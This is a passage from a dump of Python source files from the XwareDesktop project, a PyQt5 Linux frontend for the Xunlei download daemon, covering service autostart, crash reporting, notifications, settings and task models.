super().__init__(parent)\n\n app.aboutToQuit.connect(self.stopXware)\n self.startXware()\n self._t = threading.Thread(target = self._watcherThread, daemon = True,\n name = \"xwared/etm watch thread\")\n self._t.start()\n app.sigMainWinLoaded.connect(self.connectUI)\n\n @pyqtProperty(bool, notify = statusUpdated)\n def etmStatus(self):\n return self._etmStatus\n\n @pyqtProperty(bool, notify = statusUpdated)\n def xwaredStatus(self):\n return self._xwaredStatus\n\n @pyqtProperty(str, notify = statusUpdated)\n def userId(self):\n return self._userId\n\n @pyqtProperty(str, notify = statusUpdated)\n def peerId(self):\n return self._peerId\n\n @pyqtProperty(int, notify = statusUpdated)\n def lcPort(self):\n return self._lcPort\n\n def _statusUpdate(self, etmStatus, xwaredStatus, userId, peerId, lcPort):\n self._etmStatus = etmStatus\n self._xwaredStatus = xwaredStatus\n self._userId = userId\n self._peerId = peerId\n self._lcPort = lcPort\n self.statusUpdated.emit()\n\n @pyqtSlot()\n def connectUI(self):\n # Note: The menu actions enable/disable toggling are handled by statusbar.\n app.mainWin.action_ETMstart.triggered.connect(self.slotStartETM)\n app.mainWin.action_ETMstop.triggered.connect(self.slotStopETM)\n app.mainWin.action_ETMrestart.triggered.connect(self.slotRestartETM)\n\n @staticmethod\n def startXware():\n try:\n 
callXwaredInterface(\"start\")\n except InvalidSocket:\n pass\n\n @staticmethod\n def stopXware():\n try:\n callXwaredInterface(\"quit\")\n except InvalidSocket:\n pass\n\n @property\n def startEtmWhen(self):\n # return None if cannot get the value\n try:\n return callXwaredInterface(\"getStartEtmWhen\")\n except InvalidSocket:\n return None\n\n @startEtmWhen.setter\n def startEtmWhen(self, value):\n callXwaredInterface(\"setStartEtmWhen\", value)\n\n def _watcherThread(self):\n while True:\n try:\n backendInfo = callXwaredInterface(\"infoPoll\")\n self._statusUpdate(etmStatus = True if backendInfo.etmPid else False,\n xwaredStatus = True,\n userId = backendInfo.userId,\n peerId = backendInfo.peerId,\n lcPort = backendInfo.lcPort)\n except InvalidSocket:\n self._statusUpdate(etmStatus = False,\n xwaredStatus = False,\n userId = 0,\n peerId = \"\",\n lcPort = 0)\n\n time.sleep(1)\n\n @pyqtSlot()\n def slotStartETM(self):\n callXwaredInterface(\"startETM\")\n\n @pyqtSlot()\n def slotStopETM(self):\n callXwaredInterface(\"stopETM\")\n\n @pyqtSlot()\n def slotRestartETM(self):\n callXwaredInterface(\"restartETM\")\n\n @property\n def managedBySystemd(self):\n return os.path.lexists(constants.SYSTEMD_SERVICE_ENABLED_USERFILE) and \\\n os.path.lexists(constants.SYSTEMD_SERVICE_USERFILE)\n\n @managedBySystemd.setter\n def managedBySystemd(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.SYSTEMD_SERVICE_ENABLED_USERFILE))\n\n trySymlink(constants.SYSTEMD_SERVICE_FILE,\n constants.SYSTEMD_SERVICE_USERFILE)\n\n trySymlink(constants.SYSTEMD_SERVICE_USERFILE,\n constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n else:\n tryRemove(constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n tryRemove(constants.SYSTEMD_SERVICE_USERFILE)\n if getInitType() == InitType.SYSTEMD:\n os.system(\"systemctl --user daemon-reload\")\n\n @property\n def managedByUpstart(self):\n return os.path.lexists(constants.UPSTART_SERVICE_USERFILE)\n\n @managedByUpstart.setter\n def managedByUpstart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.UPSTART_SERVICE_USERFILE))\n\n trySymlink(constants.UPSTART_SERVICE_FILE,\n constants.UPSTART_SERVICE_USERFILE)\n else:\n tryRemove(constants.UPSTART_SERVICE_USERFILE)\n if getInitType() == InitType.UPSTART:\n os.system(\"initctl --user reload-configuration\")\n\n @property\n def managedByAutostart(self):\n return os.path.lexists(constants.AUTOSTART_DESKTOP_USERFILE)\n\n @managedByAutostart.setter\n def managedByAutostart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.AUTOSTART_DESKTOP_USERFILE))\n\n trySymlink(constants.AUTOSTART_DESKTOP_FILE,\n constants.AUTOSTART_DESKTOP_USERFILE)\n else:\n tryRemove(constants.AUTOSTART_DESKTOP_USERFILE)\n"
},
{
"alpha_fraction": 0.5727181434631348,
"alphanum_fraction": 0.5797392129898071,
"avg_line_length": 27.485713958740234,
"blob_id": "4ce6e0a2cbd47cb6b3ee3e9a9af01ad731e735a3",
"content_id": "6b5b08253db988777767b81dbcbe11e9e30dd07c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 35,
"path": "/src/frontend/CrashReport/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\n\nimport os, threading\nimport pickle, binascii\n\n\nclass CrashReport(object):\n def __init__(self, tb):\n super().__init__()\n payload = dict(traceback = tb,\n thread = threading.current_thread().name)\n pid = os.fork()\n if pid == 0:\n # child\n cmd = (os.path.join(os.path.dirname(__file__), \"CrashReportApp.py\"),\n self.encodePayload(payload))\n os.execv(cmd[0], cmd)\n else:\n pass\n\n @staticmethod\n def encodePayload(payload):\n pickled = pickle.dumps(payload, 3) # protocol 3 requires Py3.0\n pickledBytes = binascii.hexlify(pickled)\n pickledStr = pickledBytes.decode(\"ascii\")\n return pickledStr\n\n @staticmethod\n def decodePayload(payload):\n pickledBytes = payload.encode(\"ascii\")\n pickled = binascii.unhexlify(pickledBytes)\n unpickled = pickle.loads(pickled)\n return unpickled\n"
},
{
"alpha_fraction": 0.6546977758407593,
"alphanum_fraction": 0.6594853401184082,
"avg_line_length": 28.3157901763916,
"blob_id": "39f38bf5804fcddb9709f121f754a21a17d70d45",
"content_id": "8eabc0c59dbff47629634766c137c881903da6d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1671,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 57,
"path": "/src/frontend/CrashReport/CrashAwareThreading.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Providing the utilities that make python threads know what to do when unhandled exceptions occur.\n# Typically opening the CrashReportApp and doing its stuff.\n# This is a workaround against the python bug: http://bugs.python.org/issue1230540\n\n# For the Main thread, just call installCrashReport()\n# For other non-running-yet threads, just call installThreadExceptionHandler()\n\nimport threading, traceback, sys, os\nfrom CrashReport import CrashReport\n\n\nclass _PatchedThread(threading.Thread):\n def start(self):\n self._unpatched_run = self.run\n self.run = self.new_run\n super().start()\n\n def new_run(self):\n try:\n # super().run()\n self._unpatched_run()\n except KeyboardInterrupt:\n pass\n except:\n sys.excepthook(*sys.exc_info())\n\n\ndef installThreadExceptionHandler():\n threading.Thread = _PatchedThread\n\n\ndef __installForReal():\n def __reportCrash(etype, value, tb):\n sys.__excepthook__(etype, value, tb)\n\n formatted = \"\".join(traceback.format_exception(etype, value, tb))\n\n CrashReport(formatted)\n\n if threading.current_thread() == threading.main_thread():\n sys.exit(os.EX_SOFTWARE) # Make sure MainThread exceptions also causes app termination.\n else:\n os._exit(os.EX_SOFTWARE)\n\n sys.excepthook = __reportCrash\n\n\ndef installCrashReport():\n thread = threading.current_thread()\n\n if not getattr(thread, \"IsCrashAware\", False):\n __installForReal()\n thread.IsCrashAware = True\n else:\n print(\"Already installed crash report on thread '{}'.\".format(thread.name))\n"
},
{
"alpha_fraction": 0.5783957242965698,
"alphanum_fraction": 0.581390380859375,
"avg_line_length": 36.10317611694336,
"blob_id": "9e2519e6fd6f4fad57fef3cc8446166fef0359d4",
"content_id": "03f17fd742a16f8460cf5498b3edd9eec42ae999",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4697,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 126,
"path": "/src/frontend/Notify/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSlot, QMetaType, QUrl\nfrom PyQt5.QtDBus import QDBusConnection, QDBusInterface, QDBusArgument, QDBusMessage\nfrom PyQt5.QtGui import QDesktopServices\nfrom PyQt5.QtMultimedia import QSound\n\nimport os\n\n_DBUS_NOTIFY_SERVICE = \"org.freedesktop.Notifications\"\n_DBUS_NOTIFY_PATH = \"/org/freedesktop/Notifications\"\n_DBUS_NOTIFY_INTERFACE = \"org.freedesktop.Notifications\"\n\n\nclass Notifier(QObject):\n _conn = None\n _interface = None\n _notifications = None # a dict of notifyId: taskDict\n _capabilities = None\n _completedTasksStat = None\n\n def __init__(self, parent):\n super().__init__(parent)\n self._conn = QDBusConnection(\"Xware Desktop\").sessionBus()\n\n self._interface = QDBusInterface(_DBUS_NOTIFY_SERVICE,\n _DBUS_NOTIFY_PATH,\n _DBUS_NOTIFY_INTERFACE,\n self._conn)\n\n self._notifications = {}\n self._completedTasksStat = app.etmpy.completedTasksStat\n self._completedTasksStat.sigTaskCompleted.connect(self.notifyTask)\n\n self._capabilities = self._getCapabilities()\n if \"actions\" in self._capabilities:\n successful = self._conn.connect(_DBUS_NOTIFY_SERVICE,\n _DBUS_NOTIFY_PATH,\n _DBUS_NOTIFY_INTERFACE,\n \"ActionInvoked\", self.slotActionInvoked)\n if not successful:\n logging.error(\"ActionInvoked connect failed.\")\n\n self._qSound_complete = QSound(\":/sound/download-complete.wav\", self)\n\n @property\n def isConnected(self):\n return self._conn.isConnected()\n\n def notifyTask(self, taskId):\n task = self._completedTasksStat.getTask(taskId)\n\n if task.get(\"state\", None) == 11: # see definitions in class TaskStatistic.\n if app.settings.getbool(\"frontend\", \"notifybysound\"):\n self._qSound_complete.play()\n self._dbus_notify(task)\n else:\n # TODO: Also notify if errors occur\n pass\n\n def _getCapabilities(self):\n # get libnotify server caps and remember it.\n qdBusMsg = self._interface.call(\n \"GetCapabilities\"\n )\n if qdBusMsg.errorName():\n logging.error(\"cannot get org.freedesktop.Notifications.GetCapabilities\")\n return []\n else:\n return qdBusMsg.arguments()[0]\n\n def _dbus_notify(self, task):\n if not app.settings.getbool(\"frontend\", \"popnotifications\"):\n return\n\n if \"actions\" in self._capabilities:\n actions = QDBusArgument([\"open\", \"打开\", \"openDir\", \"打开文件夹\"], QMetaType.QStringList)\n else:\n actions = QDBusArgument([], QMetaType.QStringList)\n\n qdBusMsg = self._interface.call(\n \"Notify\",\n QDBusArgument(\"Xware Desktop\", QMetaType.QString), # app_name\n QDBusArgument(0, QMetaType.UInt), # replace_id\n QDBusArgument(\"xware-desktop\", QMetaType.QString), # app_icon\n QDBusArgument(\"下载完成\", QMetaType.QString), # summary\n QDBusArgument(task[\"name\"], QMetaType.QString), # body\n actions,\n {\n \"category\": \"transfer.complete\",\n }, # hints\n QDBusArgument(5000, QMetaType.Int), # timeout\n )\n\n if qdBusMsg.errorName():\n logging.error(\"DBus, notifyTask {}: {}\".format(qdBusMsg.errorName(),\n qdBusMsg.errorMessage()))\n else:\n # add it to the dict\n self._notifications[qdBusMsg.arguments()[0]] = task\n\n @pyqtSlot(QDBusMessage)\n def slotActionInvoked(self, msg):\n notifyId, action = msg.arguments()\n task = self._notifications.get(notifyId, None)\n if not task:\n # other applications' notifications\n return\n name = task[\"name\"] # filename\n path = task[\"path\"] # location\n\n if action == \"open\":\n openPath = os.path.join(path, name)\n elif action == \"openDir\":\n openPath = path\n elif action 
== \"default\": # Unity's notify osd always have a default action.\n return\n else:\n raise Exception(\"Unknown action from slotActionInvoked: {}.\".format(action))\n\n localOpenPath = app.mountsFaker.convertToLocalPath(openPath)\n qUrl = QUrl.fromLocalFile(localOpenPath)\n QDesktopServices().openUrl(qUrl)\n"
},
{
"alpha_fraction": 0.6210423707962036,
"alphanum_fraction": 0.6259133219718933,
"avg_line_length": 32.655738830566406,
"blob_id": "ff8f731b2ad6af432c029726dc77763c72455507",
"content_id": "4fd3e04929a6a8685b159115764b617710ea4681",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2053,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 61,
"path": "/src/shared/config.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\n\nimport configparser, pickle, binascii\n\n\nclass SettingsAccessorBase(object):\n def __init__(self, configFilePath, defaultDict, **kwargs):\n super().__init__()\n self.config = configparser.ConfigParser()\n self._configFilePath = configFilePath\n self._defaultDict = defaultDict\n self.config.read(self._configFilePath)\n\n def has(self, section, key):\n return self.config.has_option(section, key)\n\n def get(self, section, key):\n return self.config.get(section, key, fallback = self._defaultDict[section][key])\n\n def set(self, section, key, value):\n try:\n self.config.set(section, key, value)\n except configparser.NoSectionError:\n self.config.add_section(section)\n self.config.set(section, key, value)\n\n def getint(self, section, key):\n return int(self.get(section, key))\n\n def setint(self, section, key, value):\n assert type(value) is int\n self.set(section, key, str(value))\n\n def getbool(self, section, key):\n return True if self.get(section, key) in (\"1\", True) else False\n\n def setbool(self, section, key, value):\n assert type(value) is bool\n self.set(section, key, \"1\" if value else \"0\")\n\n def getobj(self, section, key):\n pickledStr = self.get(section, key)\n if type(pickledStr) is str and len(pickledStr) > 0:\n pickledBytes = pickledStr.encode(\"ascii\")\n pickled = binascii.unhexlify(pickledBytes)\n unpickled = pickle.loads(pickled)\n return unpickled\n else:\n return pickledStr\n\n def setobj(self, section, key, value):\n pickled = pickle.dumps(value, 3) # protocol 3 requires Py3.0\n pickledBytes = binascii.hexlify(pickled)\n pickledStr = pickledBytes.decode(\"ascii\")\n self.set(section, key, pickledStr)\n\n def save(self):\n with open(self._configFilePath, 'w', encoding = \"UTF-8\") as configfile:\n self.config.write(configfile)\n"
},
{
"alpha_fraction": 0.5625957250595093,
"alphanum_fraction": 0.5706726312637329,
"avg_line_length": 33.19523620605469,
"blob_id": "ec071974315d181850219dbc2cadd4aa495be1cf",
"content_id": "4109f4708b0924fab15c2d0c42d9671905c3c092",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7451,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 210,
"path": "/src/frontend/launcher.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\n\nif __name__ == \"__main__\":\n import faulthandler, logging\n from logging import handlers\n from utils import misc\n misc.tryMkdir(os.path.expanduser(\"~/.xware-desktop\"))\n\n loggingHandler = logging.handlers.RotatingFileHandler(\n os.path.expanduser(\"~/.xware-desktop/log.txt\"),\n maxBytes = 1024 * 1024 * 5,\n backupCount = 5)\n logging.basicConfig(handlers = (loggingHandler,),\n format = \"%(asctime)s %(levelname)s:%(name)s:%(message)s\")\n\n faultLogFd = open(os.path.expanduser('~/.xware-desktop/frontend.fault.log'), 'a')\n faulthandler.enable(faultLogFd)\n\n from CrashReport import CrashAwareThreading\n CrashAwareThreading.installCrashReport()\n CrashAwareThreading.installThreadExceptionHandler()\n\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import QApplication\n\nimport fcntl\n\nfrom shared import __version__\n\nimport constants\n__all__ = ['app']\n\n\nclass XwareDesktop(QApplication):\n mainWin = None\n monitorWin = None\n sigMainWinLoaded = pyqtSignal()\n\n def __init__(self, *args):\n super().__init__(*args)\n\n import main\n from Settings import SettingsAccessor, DEFAULT_SETTINGS\n from xwaredpy import XwaredPy\n from etmpy import EtmPy\n from systray import Systray\n import mounts\n from Notify import Notifier\n from frontendpy import FrontendPy\n from Schedule import Scheduler\n\n logging.info(\"XWARE DESKTOP STARTS\")\n self.setApplicationName(\"XwareDesktop\")\n self.setApplicationVersion(__version__)\n\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n self.checkOneInstance()\n\n self.settings = SettingsAccessor(self,\n configFilePath = constants.CONFIG_FILE,\n defaultDict = DEFAULT_SETTINGS)\n\n # components\n self.xwaredpy = XwaredPy(self)\n self.etmpy = EtmPy(self)\n self.mountsFaker = mounts.MountsFaker()\n self.dbusNotify = Notifier(self)\n self.frontendpy = FrontendPy(self)\n self.scheduler = Scheduler(self)\n\n self.settings.applySettings.connect(self.slotCreateCloseMonitorWindow)\n\n self.mainWin = main.MainWindow(None)\n self.mainWin.show()\n self.sigMainWinLoaded.emit()\n\n self.systray = Systray(self)\n\n self.settings.applySettings.emit()\n\n if self.settings.get(\"internal\", \"previousversion\") == \"0.8\":\n # upgraded or fresh installed\n from PyQt5.QtCore import QUrl\n from PyQt5.QtGui import QDesktopServices\n QDesktopServices.openUrl(QUrl(\"https://github.com/Xinkai/XwareDesktop/wiki/使用说明\"))\n\n self.settings.set(\"internal\", \"previousversion\", __version__)\n\n @staticmethod\n def checkOneInstance():\n fd = os.open(constants.FRONTEND_LOCK, os.O_RDWR | os.O_CREAT)\n\n try:\n fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except BlockingIOError:\n def showStartErrorAndExit():\n from PyQt5.QtWidgets import QMessageBox\n QMessageBox.warning(None, \"Xware Desktop 启动失败\",\n \"Xware Desktop已经运行,或其没有正常退出。\\n\"\n \"请检查:\\n\"\n \" 1. 没有Xware Desktop正在运行\\n\"\n \" 2. 
上次运行的Xware Desktop没有残留\"\n \"(使用进程管理器查看名为python3或xware-desktop或launcher.py的进程)\\n\",\n QMessageBox.Ok, QMessageBox.Ok)\n sys.exit(-1)\n\n tasks = sys.argv[1:]\n if len(tasks) == 0:\n showStartErrorAndExit()\n else:\n from Tasks import CommandlineClient\n try:\n CommandlineClient(tasks)\n except FileNotFoundError:\n showStartErrorAndExit()\n except ConnectionRefusedError:\n showStartErrorAndExit()\n sys.exit(0)\n\n @pyqtSlot()\n def slotCreateCloseMonitorWindow(self):\n logging.debug(\"slotCreateCloseMonitorWindow\")\n show = self.settings.getbool(\"frontend\", \"showmonitorwindow\")\n import monitor\n if show:\n if self.monitorWin:\n pass # already shown, do nothing\n else:\n self.monitorWin = monitor.MonitorWindow(None)\n self.monitorWin.show()\n else:\n if self.monitorWin:\n logging.debug(\"close monitorwin\")\n self.monitorWin.close()\n del self.monitorWin\n self.monitorWin = None\n else:\n pass # not shown, do nothing\n\n @property\n def autoStart(self):\n return os.path.lexists(constants.DESKTOP_AUTOSTART_FILE)\n\n @autoStart.setter\n def autoStart(self, on):\n if on:\n # mkdir if autostart dir doesn't exist\n misc.tryMkdir(os.path.dirname(constants.DESKTOP_AUTOSTART_FILE))\n\n misc.trySymlink(constants.DESKTOP_FILE,\n constants.DESKTOP_AUTOSTART_FILE)\n else:\n misc.tryRemove(constants.DESKTOP_AUTOSTART_FILE)\n\n\ndef doQtIntegrityCheck():\n if os.path.lexists(\"/usr/bin/qt.conf\"):\n # Detect 115wangpan, see #80\n import tkinter as tk\n import tkinter.ttk as ttk\n\n class QtIntegrityAlert(ttk.Frame):\n def __init__(self, master):\n super().__init__(master)\n self.pack(expand = True)\n\n url = \"http://www.ubuntukylin.com/ukylin/forum.php?mod=viewthread&tid=9508\"\n self.mainText = ttk.Label(\n self,\n font=(\"Sans Serif\", 12),\n text = \"\"\"检测到系统中可能安装了115网盘。它会导致Xware Desktop和其它的基于Qt的程序无法使用。请\n\n* 卸载115网盘 或\n* 按照{url}的方法解决此问题\n\"\"\".format(url = url))\n self.mainText.pack(side = \"top\", fill = \"both\", expand = True, padx = 20,\n pady = (25, 0))\n\n self.viewThreadBtn = ttk.Button(\n self,\n text = \"我要保留115网盘,查看解决方法\",\n command = lambda: os.system(\"xdg-open '{}'\".format(url)))\n self.viewThreadBtn.pack(side = \"bottom\", fill = \"none\", expand = True, pady = 10)\n\n self.closeBtn = ttk.Button(\n self,\n text = \"我要卸载115网盘,关闭这个窗口\",\n command = lambda: root.destroy())\n self.closeBtn.pack(side = \"bottom\", fill = \"none\", expand = True, pady = 10)\n\n root = tk.Tk()\n root.title(\"Xware Desktop 提示\")\n tkapp = QtIntegrityAlert(master = root)\n sys.exit(tkapp.mainloop())\n\n\napp = None\nif __name__ == \"__main__\":\n doQtIntegrityCheck()\n\n from shared.profile import profileBootstrap\n profileBootstrap(constants.PROFILE_DIR)\n app = XwareDesktop(sys.argv)\n sys.exit(app.exec())\nelse:\n app = QApplication.instance()\n"
},
{
"alpha_fraction": 0.6688470840454102,
"alphanum_fraction": 0.6721177697181702,
"avg_line_length": 42.67856979370117,
"blob_id": "a3eb1bdbe98c7f032da12e0a2955012b5e565a35",
"content_id": "fb3b3b8fd12006e88d321eb412b3c1e0d0eca951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1223,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 28,
"path": "/src/frontend/constants.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom shared.constants import *\n\nFRONTEND_DIR = os.path.join(BASE_DIR, \"frontend\")\n\nLOGIN_PAGE = \"http://yuancheng.xunlei.com/login.html\"\nV2_PAGE = \"http://yuancheng.xunlei.com/\"\nV3_PAGE = \"http://yuancheng.xunlei.com/3/\"\n\nXWAREJS_FILE = os.path.join(FRONTEND_DIR, \"xwarejs.js\")\nXWARESTYLE_FILE = os.path.join(FRONTEND_DIR, \"style.css\")\n\nSYSTEMD_SERVICE_FILE = os.path.join(FRONTEND_DIR, \"xwared.service\")\nSYSTEMD_SERVICE_USERFILE = os.path.join(XDG_CONFIG_HOME, \"systemd/user/xwared.service\")\nSYSTEMD_SERVICE_ENABLED_USERFILE = os.path.join(XDG_CONFIG_HOME,\n \"systemd/user/default.target.wants/xwared.service\")\n\nUPSTART_SERVICE_FILE = os.path.join(FRONTEND_DIR, \"xwared.conf\")\nUPSTART_SERVICE_USERFILE = os.path.join(XDG_CONFIG_HOME,\n \"upstart/xwared.conf\")\n\nAUTOSTART_DESKTOP_FILE = os.path.join(FRONTEND_DIR, \"xwared.desktop\")\nAUTOSTART_DESKTOP_USERFILE = os.path.join(XDG_CONFIG_HOME,\n \"autostart/xwared.desktop\")\n\nDESKTOP_FILE = \"/usr/share/applications/xware-desktop.desktop\"\nDESKTOP_AUTOSTART_FILE = os.path.join(XDG_CONFIG_HOME, \"autostart/xware-desktop.desktop\")\n"
},
{
"alpha_fraction": 0.6639785170555115,
"alphanum_fraction": 0.6678885817527771,
"avg_line_length": 34.27586364746094,
"blob_id": "9f2f0a40b2415ea53ad7c42d70df012c59a64f89",
"content_id": "a54098b264a4cead73274d78ceef40554bb898a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4092,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 116,
"path": "/src/frontend/models/ProxyModel.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal, QModelIndex, QSortFilterProxyModel, Qt, Q_ENUMS, \\\n pyqtProperty\nfrom PyQt5.QtQml import qmlRegisterUncreatableType\n\nfrom utils.misc import dropPy34Enum\nfrom .TaskModel import CreationTimeRole, TaskClass, TaskClassRole\n\n\nclass ProxyModel(QSortFilterProxyModel):\n srcDataChanged = pyqtSignal(int, int) # row1, row2\n taskClassFilterChanged = pyqtSignal()\n\n Q_ENUMS(dropPy34Enum(TaskClass))\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setDynamicSortFilter(True)\n self.sort(0, Qt.DescendingOrder)\n self.setFilterCaseSensitivity(False)\n self._taskClassFilter = TaskClass.RUNNING\n\n @pyqtProperty(int, notify = taskClassFilterChanged)\n def taskClassFilter(self):\n return self._taskClassFilter\n\n @taskClassFilter.setter\n def taskClassFilter(self, value):\n if value != self._taskClassFilter:\n self._taskClassFilter = value\n self.taskClassFilterChanged.emit()\n self.invalidateFilter()\n\n def filterAcceptsRow(self, srcRow: int, srcParent: QModelIndex):\n result = super().filterAcceptsRow(srcRow, srcParent)\n if result:\n srcModel = self.sourceModel()\n klass = srcModel.data(srcModel.index(srcRow, 0), TaskClassRole)\n if klass & self.taskClassFilter:\n return True\n else:\n return False\n\n return result\n\n @pyqtSlot(QModelIndex, QModelIndex, \"QVector<int>\")\n def _slotSrcDataChanged(self, topLeft, bottomRight, roles):\n self.srcDataChanged.emit(topLeft.row(), bottomRight.row())\n\n def setSourceModel(self, model):\n model.dataChanged.connect(self._slotSrcDataChanged)\n super().setSourceModel(model)\n self.setSortRole(CreationTimeRole)\n\n @pyqtSlot(int, result = \"QVariant\")\n def get(self, i: int):\n index = self.mapToSource(self.index(i, 0))\n return self.sourceModel().get(index)\n\n def _getModelIndex(self, rowId):\n return self.index(rowId, 0)\n\n def _getSourceModelIndex(self, rowId):\n return self.mapToSource(self._getModelIndex(rowId))\n\n def _getModelIndice(self, rowIds):\n return map(lambda row: self.index(row, 0), rowIds)\n\n def _getSourceModelIndice(self, rowIds):\n return map(self.mapToSource, self._getModelIndice(rowIds))\n\n @pyqtSlot(str, result = \"void\")\n def setNameFilter(self, name):\n if name:\n self.setFilterFixedString(name)\n else:\n self.setFilterFixedString(None)\n\n @pyqtSlot(\"QVariantMap\", result = \"void\")\n def pauseTasks(self, options):\n srcIndice = list(self._getSourceModelIndice(options[\"rows\"]))\n self.sourceModel().pauseTasks(srcIndice, options)\n\n @pyqtSlot(\"QVariantMap\", result = \"void\")\n def startTasks(self, options):\n srcIndice = list(self._getSourceModelIndice(options[\"rows\"]))\n self.sourceModel().startTasks(srcIndice, options)\n\n @pyqtSlot(int, result = \"void\")\n def systemOpen(self, rowId):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().systemOpen(srcIndex)\n\n @pyqtSlot(int, bool, result = \"void\")\n def openLixianChannel(self, rowId, enable: bool):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().openLixianChannel(srcIndex, enable)\n\n @pyqtSlot(int, result = \"void\")\n def openVipChannel(self, rowId):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().openVipChannel(srcIndex)\n\n @pyqtSlot(int, result = \"void\")\n def viewOneTask(self, rowId):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().viewOneTask(srcIndex)\n\n @pyqtSlot(\"QList<int>\", result = \"void\")\n def viewMultipleTasks(self, rowIds):\n srcIndice = 
list(self._getSourceModelIndice(rowIds))\n self.sourceModel().viewMultipleTasks(srcIndice)\n\nqmlRegisterUncreatableType(ProxyModel, 'TaskModel', 1, 0, 'TaskModel',\n \"TaskModel cannot be created.\")\n"
},
{
"alpha_fraction": 0.6721683144569397,
"alphanum_fraction": 0.6744336485862732,
"avg_line_length": 33.33333206176758,
"blob_id": "c76b36171f203d440b9db5416934d3c16296c132",
"content_id": "1e626bc2c3f45a3e8e2679f283129dfc33c92f64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3094,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 90,
"path": "/src/frontend/Settings/QuickSpeedLimit.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QWidget, QWidgetAction\n\nfrom etmpy import EtmSetting\nfrom CustomStatusBar.CStatusButton import CustomStatusBarToolButton\nfrom .ui_quickspeedlimit import Ui_Form_quickSpeedLimit\nfrom .menu import SettingMenu\n\n\nclass QuickSpeedLimitBtn(CustomStatusBarToolButton):\n def __init__(self, parent):\n super().__init__(parent)\n menu = SettingMenu(self)\n action = SpeedLimitingWidgetAction(self)\n menu.addAction(action)\n self.setMenu(menu)\n self.setText(\"限速\")\n\n # Should be disabled when ETM not running\n app.xwaredpy.statusUpdated.connect(self.slotXwareStatusChanged)\n self.slotXwareStatusChanged()\n\n @pyqtSlot()\n def slotXwareStatusChanged(self):\n self.setEnabled(app.xwaredpy.etmStatus)\n\n\nclass SpeedLimitingWidgetAction(QWidgetAction):\n def __init__(self, parent):\n super().__init__(parent)\n widget = QuickSpeedLimitForm(parent)\n self.setDefaultWidget(widget)\n\n\nclass QuickSpeedLimitForm(QWidget, Ui_Form_quickSpeedLimit):\n def __init__(self, parent):\n super().__init__(parent)\n self.setupUi(self)\n self.checkBox_ulSpeedLimit.stateChanged.connect(self.slotStateChanged)\n self.checkBox_dlSpeedLimit.stateChanged.connect(self.slotStateChanged)\n self.slotStateChanged()\n\n def slotStateChanged(self):\n self.spinBox_ulSpeedLimit.setEnabled(self.checkBox_ulSpeedLimit.isChecked())\n self.spinBox_dlSpeedLimit.setEnabled(self.checkBox_dlSpeedLimit.isChecked())\n\n def loadSetting(self):\n etmSettings = app.etmpy.getSettings()\n\n self.setEnabled(bool(etmSettings))\n if not self.isEnabled():\n return\n\n if etmSettings.dLimit == -1:\n self.checkBox_dlSpeedLimit.setChecked(False)\n self.spinBox_dlSpeedLimit.setValue(app.settings.getint(\"internal\", \"dlspeedlimit\"))\n else:\n self.checkBox_dlSpeedLimit.setChecked(True)\n self.spinBox_dlSpeedLimit.setValue(etmSettings.dLimit)\n\n if etmSettings.uLimit == -1:\n self.checkBox_ulSpeedLimit.setChecked(False)\n self.spinBox_ulSpeedLimit.setValue(app.settings.getint(\"internal\", \"ulspeedlimit\"))\n else:\n self.checkBox_ulSpeedLimit.setChecked(True)\n 